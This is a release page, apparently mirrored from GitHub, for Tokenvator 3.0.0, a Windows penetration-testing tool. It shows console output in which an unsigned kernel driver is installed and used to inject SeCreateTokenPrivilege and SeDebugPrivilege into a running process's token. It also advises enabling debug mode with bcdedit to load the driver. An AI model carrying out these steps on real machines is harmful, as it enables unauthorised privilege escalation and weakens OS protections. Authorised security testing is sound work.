3.0.0
版本发布时间: 2021-07-23 00:25:48
0xbadjuju/Tokenvator最新发布版本:3.0.1(2021-08-25 03:50:28)
See the NetSPI blog for full details: https://www.netspi.com/blog/technical/network-penetration-testing/tokenvator-release-3/
(Tokens) > Install_Driver /ServiceName:TokenDriver /Path:C:\Share\KernelTokens.sys
Option Value
------ -----
servicename TokenDriver
path C:\Share\KernelTokens.sys
[*] Service Name: TokenDriver
[*] Service Path: C:\Share\KernelTokens.sys
[*] Using Service Name TokenDriver
[*] Connecting to .
[+] Connected to .
[*] Full Path: C:\Share\KernelTokens.sys
[+] Opened service
[+] Started Service
(Tokens) > Add_Privilege /Process:notepad /Privilege:SeCreateTokenPrivilegee
Option Value
------ -----
process notepad
privilege SeCreateTokenPrivilege
[+] 8568 notepad
[+] Connected to Driver
[*] Sending IOCTL 2285592
[+] 72 Bytes Returned
[+] PEPROCESS Base Address : 0xFFFFBC0F8A59F080
[+] EX_FAST_REF Base Address : 0xFFFFBC0F8A59F538
[+] EX_FAST_REF Data : 0xFFFF95027C1ED063
[+] TOKEN Base Address : 0xFFFF95027C1ED060
[+] PSEP_TOKEN_PRIVILEGES Base Address : 0xFFFF95027C1ED0A0
[+] Current Present Value : 0x602880000
[+] Updated Present Value : 0x602880004
[+] Enabled : 0x800000
[+] EnabledByDefault : 0x40800000
[*] Disconnected from Driver
(Tokens) > List_Privileges /Process:Notepad
Option Value
------ -----
process Notepad
[+] 8568 Notepad
Remote: True
Impers: False
[*] Recieved Process Handle 0x02C4
[*] Recieved Token Handle 0x02C8
[*] Enumerating Token Privileges
[*] GetTokenInformation (TokenPrivileges) - Pass 1
[*] GetTokenInformation - Pass 2
[+] Enumerated 6 Privileges
Privilege Name Enabled
-------------- -------
SeCreateTokenPrivilege False
SeShutdownPrivilege False
SeChangeNotifyPrivilege True
SeUndockPrivilege False
SeIncreaseWorkingSetPrivilege False
SeTimeZonePrivilege False
(Tokens) > Add_Privilege /Process:notepad /Privilege:SeDebugPrivilege lege
Option Value
------ -----
process notepad
privilege SeDebugPrivilege
[+] 8568 notepad
[+] Connected to Driver
[*] Sending IOCTL 2285592
[+] 72 Bytes Returned
[+] PEPROCESS Base Address : 0xFFFFBC0F8A59F080
[+] EX_FAST_REF Base Address : 0xFFFFBC0F8A59F538
[+] EX_FAST_REF Data : 0xFFFF95027C1ED062
[+] TOKEN Base Address : 0xFFFF95027C1ED060
[+] PSEP_TOKEN_PRIVILEGES Base Address : 0xFFFF95027C1ED0A0
[+] Current Present Value : 0x602880004
[+] Updated Present Value : 0x602980004
[+] Enabled : 0x800000
[+] EnabledByDefault : 0x40800000
[*] Disconnected from Driver
(Tokens) > List_Privileges /Process:Notepad
Option Value
------ -----
process Notepad
[+] 8568 Notepad
Remote: True
Impers: False
[*] Recieved Process Handle 0x02C8
[*] Recieved Token Handle 0x02CC
[*] Enumerating Token Privileges
[*] GetTokenInformation (TokenPrivileges) - Pass 1
[*] GetTokenInformation - Pass 2
[+] Enumerated 7 Privileges
Privilege Name Enabled
-------------- -------
SeCreateTokenPrivilege False
SeShutdownPrivilege False
SeDebugPrivilege False
SeChangeNotifyPrivilege True
SeUndockPrivilege False
SeIncreaseWorkingSetPrivilege False
SeTimeZonePrivilege False
Note: The KernelToken.sys driver is compiled and attached, but is not signed.
If you want to test it without signing it run the command bcdedit /debug on
and restart.
Note: This release is for .Net 4.5 x64
1、 KernelTokens.sys 12.14KB
2、 Tokenvator.exe 172KB